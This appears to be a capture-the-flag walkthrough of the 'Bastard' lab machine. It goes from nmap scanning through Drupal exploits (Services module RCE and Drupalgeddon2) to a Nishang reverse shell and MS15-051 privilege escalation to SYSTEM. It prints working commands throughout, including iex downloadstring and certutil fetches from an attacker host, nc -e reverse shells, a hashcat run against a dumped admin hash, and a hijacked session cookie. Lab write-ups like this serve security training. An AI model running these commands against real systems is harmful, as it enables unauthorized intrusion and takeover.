# Bastard **Reconnaissance:** ``` ┌──(kali㉿kali)-[~] └─$ sudo nmap -sC -sV -O 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to Bastard | Bastard 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC ``` ``` ┌──(kali㉿kali)-[~] └─$ sudo nmap -sU -O 10.10.10.9 All 1000 scanned ports on 10.10.10.9 are in ignored states. ``` We have three open ports. * Port 80: running Drupal 7 * Port 135 & 49154: running Microsoft Windows RPC I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7. **Enumeration: Drupal TCP 80** Visit the web application in the browser. ``` http://10.10.10.9/ ``` It’s running Drupal which is is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version. ``` http://10.10.10.9/CHANGELOG.txt Drupal 7.54, 2017-02-01 ``` Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in. When it is an off-the-shelf software, I usually don’t run a brute force attack on it because it probably has a lock out policy in place. **Searchsploit:** Next, run searchsploit. ``` ┌──(kali㉿kali)-[~] └─$ searchsploit drupal 7 ``` Let’s view vulnerability number 41564. ``` ┌──(kali㉿kali)-[~] └─$ searchsploit -m 41564 Exploit: Drupal 7.x Module Services - Remote Code Execution URL: https://www.exploit-db.com/exploits/41564 Path: /usr/share/exploitdb/exploits/php/webapps/41564.php Codes: N/A Verified: True File Type: C++ source, ASCII text Copied to: /home/kali/41564.php ``` It links to this, It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, it we see that it visit the path /rest\_endpoint to conduct the exploit. {% embed url="" %} ``` $url = 'http://vmweb.lan/drupal-7.54'; $endpoint_path = '/rest_endpoint'; $endpoint = 'rest_endpoint'; ``` That path is not found on the box, however, if we simply change it to /rest it works! ``` http://10.10.10.9/rest ``` So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box. **Foothold:** Make the following changes to the exploit code. ``` $url = 'http://10.10.10.9'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $file = [ 'filename' => 'shell.php', 'data' => '' ]; ``` Run the exploit. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ php 41564.php # Exploit Title: Drupal 7.x Services Module Remote Code Execution # Vendor Homepage: https://www.drupal.org/project/services # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/drupal-services-module-rce #!/usr/bin/php Stored session information in session.json Stored user information in user.json Cache contains 7 entries File written: 10.10.10.9/shell.php ``` Perfect! It created two files: session.json and user.json. View the content of user.json. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ cat user.json "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE" ``` I can identify that hash as Drupal 7, and try to break it: {% embed url="" %} ``` hashcat -m 7900 $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE /usr/share/wordlists/rockyou.txt --force ``` However, that was going to take about three days on my system, and I don’t really need the password at this point. It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ cat session.json { "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913", "session_id": "FVOXx3tasjzJLhRuUq_k33sXCbkWyfx7-9TuHjMEWI0", "token": "3eJjQU7S1jUPgVIwYOeyR26UvQntmh9XPXN_B13VB4U" } ``` ``` http://10.10.10.9/shell.php?cmd=dir ``` **Exploit: Ruby Script** On reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path. {% embed url="" %} I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning: ``` ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit -m exploits/php/webapps/44449.rb Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution URL: https://www.exploit-db.com/exploits/44449 Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb Codes: CVE-2018-7600 Verified: True File Type: Ruby script, ASCII text Copied to: /home/kali/Desktop/44449.rb ┌──(kali㉿kali)-[~/Desktop] └─$ ruby 44449.rb Usage: ruby drupalggedon2.rb [--authentication] [--verbose] Example for target that does not require authentication: ruby drupalgeddon2.rb https://example.com Example for target that does require authentication: ruby drupalgeddon2.rb https://example.com --authentication ``` I’ll fix the warning about \r with dos2unix: ``` ┌──(kali㉿kali)-[~/Desktop] └─$ dos2unix 44449.rb dos2unix: converting file 44449.rb to Unix format... ┌──(kali㉿kali)-[~/Desktop] └─$ ruby 44449.rb http://10.10.10.9/ drupalgeddon2>> whoami nt authority\iusr drupalgeddon2>> cd \dimitris drupalgeddon2>> dir ``` **Shell: Nishang** I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, adding a call to the function to the end, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443, and then serving that directory with python3 -m http.server 80. I’ll also open a nc listener on port 443. {% embed url="" %} ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443 ``` ``` ┌──(kali㉿kali)-[~/Desktop] └─$ python3 -m http.server 80 ┌──(kali㉿kali)-[~] └─$ nc -lnvp 443 ``` Then I give this command to the Drupalgeddon2 shell: ``` drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/shell.ps1') ``` My python webserver gets the request for shell.ps1 and sends it When shell.ps1 is run, it loads all the functions, and then invokes the reverse shell to me on port 443, which I get in nc: ``` PS C:\inetpub\drupal-7.54>whoami nt authority\iusr ``` **Privesc : MS15-051** We use the command “whoami /priv” to check the privileges with our user and see that we have permissions to the privilege “SeImpersonatePrivilege“. We already know this one from other machines that we have solved, we know that we can impersonate the user “nt authority\system“. ``` PS C:\inetpub\drupal-7.54> whoami /priv PS C:\inetpub\drupal-7.54> systeminfo ``` As we can see, we are in a Windows Server 2008 R2, of which there are several kernel-level exploits that we could also use. I’ll grab it from here: {% embed url="" %} ``` ┌──(kali㉿kali)-[~/Desktop] └─$ python3 -m http.server 80 PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/nc64.exe PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/ms15-051x64.exe PS C:\inetpub\drupal-7.54> dir PS C:\inetpub\drupal-7.54> .\nc64.exe -e cmd.exe 10.10.14.2 443 ┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 443 ``` ``` C:\inetpub\drupal-7.54>.\ms15-051x64.exe "whoami" .\ms15-051x64.exe "whoami" [#] ms15-051 fixed by zcgonvh [!] process with pid: 2532 created. ============================== nt authority\system C:\inetpub\drupal-7.54>whoami whoami nt authority\iusr C:\inetpub\drupal-7.54>.\ms15-051x64.exe ".\nc64.exe -e cmd.exe 10.10.14.2 443" ``` ``` ┌──(kali㉿kali)-[~] └─$ rlwrap nc -lvnp 443 C:\inetpub\drupal-7.54>whoami whoami nt authority\system C:\Users\Administrator\Desktop>type root.txt ```